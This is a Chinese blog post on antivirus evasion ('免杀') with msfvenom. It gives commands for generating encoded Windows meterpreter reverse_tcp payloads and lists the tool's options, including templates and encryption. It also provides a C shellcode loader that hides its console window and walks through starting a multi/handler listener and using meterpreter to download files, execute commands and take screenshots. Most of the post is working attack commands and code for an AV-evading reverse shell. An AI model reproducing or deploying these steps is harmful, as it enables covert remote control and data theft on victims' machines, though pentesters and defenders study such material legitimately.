首页 > 其他分享 >免杀——msfvenom基本操作

免杀——msfvenom基本操作

时间:2022-12-31 15:45:54浏览次数:55  
标签:免杀 -- list 列出 windows msfvenom 基本操作 payload

MSF生成EXE:

msfvenom -p 有效载荷 -f 输出格式 -o 输出文件
msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe

MSF生成Shellcode:

msfvenom -a 系统架构 --platform 系统平台 -p 有效载荷 lhost=攻击机IP lport=攻击机端口 -e 编码方式 -i编码次数 -f 输出格式 -o 输出文件
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.1.1 lport=8888 -i 3 -e x86/shikata_ga_nai -f exe -o payload.exe

常用查看命令:

msfvenom -l archs #查看支持的系统架构
msfvenom -l platforms #查看支持系统平台
msfvenom -l payload #列出所有可用的payload
msfvenom -l formats #列出所有的输出格式
msfvenom -l encrypt #列出所有的加密方式
msfvenom -l encoders #列出所有的编码器**

 

MSF基本操作

-l, --list <type> 
 # 列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, platforms, archs, encrypt, formats等等
 -p, --payload <payload> 
 # 指定特定的 Payload,如果被设置为 - ,那么从标准输入流中读取
 --list-options 
 # 列出--payload <value> 的标准,高级和规避选项
 -f, --format <format> 
 # 指定 Payload 的输出格式(使用 --list formats 列出)
 -e, --encoder <encoder> 
 # 指定使用的 Encoder (使用 --list encoders 列出)
 --sec-name <value> 
 # 生成大型Windows二进制文件时使用的新名称。默认值:随机4个字符的字符串
 --smallest 
 # 使用所有可用的编码器生成最小的payload
 --encrypt <value> 
 # 应用于shellcode的加密或编码类型 (使用--list encrypt 列出)
 --encrypt-key <value> 
 # 用于加密的密钥
 --encrypt-iv <value> 
 # 加密的初始化向量
 -a, --arch <arch> 
 # 指定目标系统架构(使用 --list archs 列出)
 --platform <platform> 
 # 指定目标系统平台 (使用 --list platforms 列出)
 -o, --out <path> 
 # 保存payload文件
 -b, --bad-chars <list> 
 # 设置需要在 Payload 中避免出现的字符,如: '\x00\xff'
 -n, --nopsled <length> 
 # 指定 nop 在 payload 中的数量
 -s, --space <length> 
 # 设置未经编码的 Payload 的最大长度
 --encoder-space <length> 
 # 编码后的 Payload 的最大长度
 -i, --iterations <count> 
 # 设置 Payload 的编码次数
 -c, --add-code <path> 
 # 指定包含一个额外的win32 shellcode文件
 -x, --template <path> 
 # 指定一个特定的可执行文件作为模板
 -k, --keep 
 # 保护模板程序的功能,注入的payload作为一个新的进程运行
 -v, --var-name <value> 
 # 指定一个变量名(当添加 -f 参数的时候,例如 -f python,那么输出为 python 代码, payload 会被按行格式化为 python 代码,追加到一个 python 变量中,这个参数即为指定 python 变量的变量名)
 -t, --timeout <second> 
 # 设置从STDIN读取payload的等待时间(默认为30,0为禁用)
 -h, --help 
 # 帮助

 

MSF测试:

1、MSF生成:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=192.168.226.143 lport=1250 -f c

2、使用简单的指针法加载

#include "stdafx.h"
#include <stdio.h>
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char buf[] =
(这里放生成好的数组)
main()
{
((void(*)(void))&buf)();
}

3、打开MSF监听

msfconsole
开启监听:
use exploit/multi/handler
设置payload,和生成的木马保持一致:
set payload windows/meterpreter/reverse_tcp
设置本地地址,和木马一致:
set lhost 192.168.226.143
设置本地端口,和木马一致:
set lport 1250
run

4、链接成功后进行验证

meterpreter基本命令:

getuid 当前用户权限
download 下载
execute -f calc.exe 执行cmd命令
screenshot 屏幕快照
kill 1234 终结进程
shutdown 关机

 

注:生成弹出calc的shellcode

msfvenom --platform windows -a x86 Windows/exec cmd="calc.exe"

 

标签:免杀,--,list,列出,windows,msfvenom,基本操作,payload
From: https://www.cnblogs.com/wuruixin/p/17016730.html

相关文章

  • 免杀——凯撒+RC4+Base64分离免杀
    Shellcode生成器:buf是CS生成的Shellcode#include"Caesar.h"#include"Base64.h"#include"RC4.h"intmain(){ unsignedcharbuf[]="" unsignedchar......
  • 免杀——CobatStrike基本操作
    安全测试中,将一台虚拟机作为服务器,同时也可以作为客户机。1、将服务器打开./teamserver192.168.204.148kali 2、启动客户端中文插件打开:java-Dfile.encoding=UTF......
  • 免杀——直接加载
    通过使用直接加载的方式来加载shellcode,是最初始的免杀手段。不过随着对抗的加剧,该方法现在已经不再实用。#include<stdio.h>#include<stdlib.h>#pragmacomment(li......
  • VTK_Learning_图形基本操作进阶_模型区率计算
    1.曲率计算曲率时曲面弯曲程度的一种度量,是几何体的一种重要的局部特征。如下图所示:要计算曲面上给定点M的曲率,考虑经过M的法线的一个平面与曲面相交,得到一条二维曲面,称之为......
  • VTK_Learning_图形基本操作进阶_连通区域分析
    1.连通区域分析许多图形数据中,并非只包含一个对象(连通区域)。而在处理这些图形数据时,有时需要对每一个对象单独处理或者让其单独显示。比如,利用MarchingCube方法提取三维图像......
  • VTK_Learning_图像基本操作_彩色图像生成灰度图像_彩色图像成分提取
    1.灰度图像映射vtkImageLuminance负责将一个RGB彩色图像转换为一个单组分的灰度图像。映射公式如下:luminance=0.3*R+0.59*G+0.11*B该公式中,R为输入图像的第一分量(红......
  • python之xml基本操作
    1.概述XML(ExtensibleMarkupLanguage)中文译为可扩展标记语言,它是一种简单、灵活、易扩展的文本格式,它主要关注数据内容,常用来传送、存储数据。当通过XML来传送数据......
  • mysql的基本操作
    #mysql的基本操作###配置文件```mysql[mysqld]tmpdir=/mysql/tmp/basedir=/mysqldatadir=/mysql/datasymbolic-links=0character_set_server=utf8mb4sql_mode=NO_ENGIN......
  • Docker基本操作(端口?网络模式?)(五)
    一、端口暴露Docker容器更多情况下是用来运行Web应用的,所以要如何访问到容器中的Web服务呢?比如我们现在运行一个nginx容器服务:$dockerrun--namewebserver-d......
  • Docker基本操作(镜像操作?容器操作?)(四)
    Docker的基本原理我们已经了解了,也已经安装上了,接下来我们就一起来学习下Docker的常用操作,实际上主要就是DockerCLI的一些常用命令使用。一、镜像操作之前我们提......